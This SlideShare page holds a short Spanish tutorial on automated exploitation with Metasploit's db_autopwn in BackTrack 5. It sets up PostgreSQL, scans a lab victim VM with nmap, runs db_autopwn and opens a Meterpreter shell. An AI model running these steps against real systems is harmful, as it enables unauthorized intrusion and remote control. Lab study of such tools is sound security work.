Db autopwn backtrack_5

•

2 gefällt mir•923 views

Este documento proporciona instrucciones para configurar una base de datos PostgreSQL y realizar un autopwn en Backtrack 5 utilizando Nmap, Metasploit y la base de datos PostgreSQL recién configurada. Instruye al lector en instalar PostgreSQL, configurar una base de datos y usuario, escanear un objetivo con Nmap para identificar vulnerabilidades, y luego ejecutar un ataque autopwn utilizando la información de Nmap y la base de datos de Metasploit.

Bildung

ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql

Aquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL

El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:

apt-get install postgresql libpq-dev

el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql.

Al finalizar la instalación conectamos con el postgresql y cambiamos el password

sudo su postgres -c psql

Aquí pones el password nuevo.

ALTER USER postgres WITH PASSWORD 'password' ;

después q

sudo passwd -d postgres

sudo su postgres -c passwd con este se cambia el password

Esto es para conectarse del ruby al postgresql.
gem install pg

Ahora llamamos a metasploit

msfconsole

db_driver postgresql

y para conectar con la base de datos

db_connect postgres:”password”@127.0.0.1/metasploitdb

El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar
a la base de datos.

Ahora utilizamos nmap para ver las vulnerabilidades de la víctima.

nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtual
de xp sp 1.

Nmap escaneo los puertos e identifico el sistema operativo de la víctima.
Ahora procedemos con el ataque.

db_hosts

db_autopwn -t -p -e

AL terminar el autopwn muestra las posibles sesiones.

Para entrar a una de ellas
sessions -i 1 el numero es la sesión que fue elegida.

Aquí se puede ver como entra al shell de windows desde meterpreter.

ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

Weitere ähnliche Inhalte

Was ist angesagt?

Ethical hacking 02Tensor

Starta KaliLinuxRafael Cornejo Martinez

AlumnoRafael Cornejo Martinez

Instalacion de java Geovanny Yungán

Subrutinas de retardoSalvador Gonzalez

Tutorial okm rogerrogervillen

Realizar un cron con centos 7santiago Ramirez Ramirez

Servidor ftp en centos 7santiago Ramirez Ramirez

Como hacer arp spoofing eTensor

Things i wish someone told me about node jsAlexandre Ferrando

Hibernate - JPA @luceJavier Gamarra

PROGRAMACIÓN PARALELARaquel Solano

Practica7Meztli Valeriano Orozco

Como utilizar rutinas_autolispJOHN NIEL FIGUEROA POZO

Instalacion Postgresragmyl

Pic retardos por softwareRaul Marihuan Gonzalez

Escaneo de Puertosarnoldvq16

Hilosjohanna20

Pentesting BasicoCuauhtémoc García Somera

Fail2 banyaneli14

Was ist angesagt? (20)

Ethical hacking 02

Starta KaliLinux

Alumno

Instalacion de java

Subrutinas de retardo

Tutorial okm roger

Realizar un cron con centos 7

Servidor ftp en centos 7

Como hacer arp spoofing e

Things i wish someone told me about node js

Hibernate - JPA @luce

PROGRAMACIÓN PARALELA

Practica7

Como utilizar rutinas_autolisp

Instalacion Postgres

Pic retardos por software

Escaneo de Puertos

Hilos

Pentesting Basico

Fail2 ban

Ähnlich wie Db autopwn backtrack_5

Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica

Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapxavazquez

Instalación y configuración de sgbd presentacionhugoAlvidrez

Replicacion con postgresql y slonyJohanna Mendez

Sql injectionMauro Gomez Mejia

GOsa+samba+ldapRogelio Cores Raventós

Seguridad: Backtrack2 Francesc Perez

Instalacion de Postrgre sql en ubuntuDavid Vevelas

Práctica 3 FTPTerrafx9

Como monitorear asterisk utilizando nrpe de nagiosMcp Servicios

Como crear usuarios y asignar permisos en postgre sql blog de alevskantoniorua1

Como monitorear asterisk utilizando nrpe de nagiosGuillermo Henriquez Gonzalez

Funcionamiento con my sqldante123456

Docker y PostgreSQLJorge Moratilla Porras

Tp1 db avanz-v1.1Javier Caniparoli

Cassandra y php para desarrolladores sqlMarco Antonio Martinez F

Configuración de un servidor dhcp en linux (debian 5)admonfingerstyle

Manual de instalación de mantis 1.2.11 en CentOS 5.8Joshep Ticante

Documentoalejandroprietosuare

Ähnlich wie Db autopwn backtrack_5 (20)

Cómo explotar EternalBlue en Windows Server 2012 R2

Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap

Instalación y configuración de sgbd presentacion

Replicacion con postgresql y slony

Sql injection

GOsa+samba+ldap

Seguridad: Backtrack2

Instalacion de Postrgre sql en ubuntu

Práctica 3 FTP

Como monitorear asterisk utilizando nrpe de nagios

Como crear usuarios y asignar permisos en postgre sql blog de alevsk

Como monitorear asterisk utilizando nrpe de nagios

Funcionamiento con my sql

Docker y PostgreSQL

Tp1 db avanz-v1.1

Cassandra y php para desarrolladores sql

Configuración de un servidor dhcp en linux (debian 5)

Manual de instalación de mantis 1.2.11 en CentOS 5.8

Documento

Kürzlich hochgeladen

TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...jlorentemartos

Power Point E. S.: Los dos testigos.pptxhttps://gramadal.wordpress.com/

RESOLUCIÓN VICEMINISTERIAL 00048 - 2024 EVALUACIONamelia poma

activ4-bloque4 transversal doctorado.pdfRosabel UA

1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...JoseMartinMalpartida1

Los avatares para el juego dramático en entornos virtualesMarisolMartinez707897

FUERZA Y MOVIMIENTO ciencias cuarto basico.pptNancyMoreiraMora1

Sesión de clase APC: Los dos testigos.pdfhttps://gramadal.wordpress.com/

Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESOluismii249

Louis Jean François Lagrenée. Erotismo y sensualidad. El erotismo en la Hist...Ars Erótica

PP_Comunicacion en Salud: Objetivación de signos y síntomasOscar López Comunicaciones - OL.COM

Desarrollo y Aplicación de la Administración por ValoresJonathanCovena1

Los dos testigos. Testifican de la VerdadAlejandrino Halire Ccahuana

ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA

Tema 17. Biología de los microorganismos 2024IES Vicent Andres Estelles

Procedimientos para la planificación en los Centros Educativos tipo V ( multi...Katherine Concepcion Gonzalez

Plan-de-la-Patria-2019-2025- TERCER PLAN SOCIALISTA DE LA NACIÓN.pdfcarolinamartinezsev

Tema 11. Dinámica de la hidrosfera 2024IES Vicent Andres Estelles

Proyecto de aprendizaje dia de la madre MINT.pdfpatriciaines1993

6°_GRADO_-_MAYO_06 para sexto grado de primariaWilian24

Kürzlich hochgeladen (20)

TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...

Power Point E. S.: Los dos testigos.pptx

RESOLUCIÓN VICEMINISTERIAL 00048 - 2024 EVALUACION

activ4-bloque4 transversal doctorado.pdf

1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...

Los avatares para el juego dramático en entornos virtuales

FUERZA Y MOVIMIENTO ciencias cuarto basico.ppt

Sesión de clase APC: Los dos testigos.pdf

Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO

Louis Jean François Lagrenée. Erotismo y sensualidad. El erotismo en la Hist...

PP_Comunicacion en Salud: Objetivación de signos y síntomas

Desarrollo y Aplicación de la Administración por Valores

Los dos testigos. Testifican de la Verdad

ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA

Tema 17. Biología de los microorganismos 2024

Procedimientos para la planificación en los Centros Educativos tipo V ( multi...

Plan-de-la-Patria-2019-2025- TERCER PLAN SOCIALISTA DE LA NACIÓN.pdf

Tema 11. Dinámica de la hidrosfera 2024

Proyecto de aprendizaje dia de la madre MINT.pdf

6°_GRADO_-_MAYO_06 para sexto grado de primaria

Db autopwn backtrack_5

1. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql Aquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal: apt-get install postgresql libpq-dev el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql. Al finalizar la instalación conectamos con el postgresql y cambiamos el password sudo su postgres -c psql

2. Aquí pones el password nuevo. ALTER USER postgres WITH PASSWORD 'password' ; después q sudo passwd -d postgres sudo su postgres -c passwd con este se cambia el password Esto es para conectarse del ruby al postgresql. gem install pg

3. Ahora llamamos a metasploit msfconsole db_driver postgresql y para conectar con la base de datos db_connect postgres:”password”@127.0.0.1/metasploitdb El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos. Ahora utilizamos nmap para ver las vulnerabilidades de la víctima. nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtual de xp sp 1.

4. Nmap escaneo los puertos e identifico el sistema operativo de la víctima. Ahora procedemos con el ataque. db_hosts db_autopwn -t -p -e AL terminar el autopwn muestra las posibles sesiones. Para entrar a una de ellas sessions -i 1 el numero es la sesión que fue elegida.

5. Aquí se puede ver como entra al shell de windows desde meterpreter. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

Db autopwn backtrack_5

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Was ist angesagt?

Was ist angesagt? (20)

Ähnlich wie Db autopwn backtrack_5

Ähnlich wie Db autopwn backtrack_5 (20)

Kürzlich hochgeladen

Kürzlich hochgeladen (20)

Db autopwn backtrack_5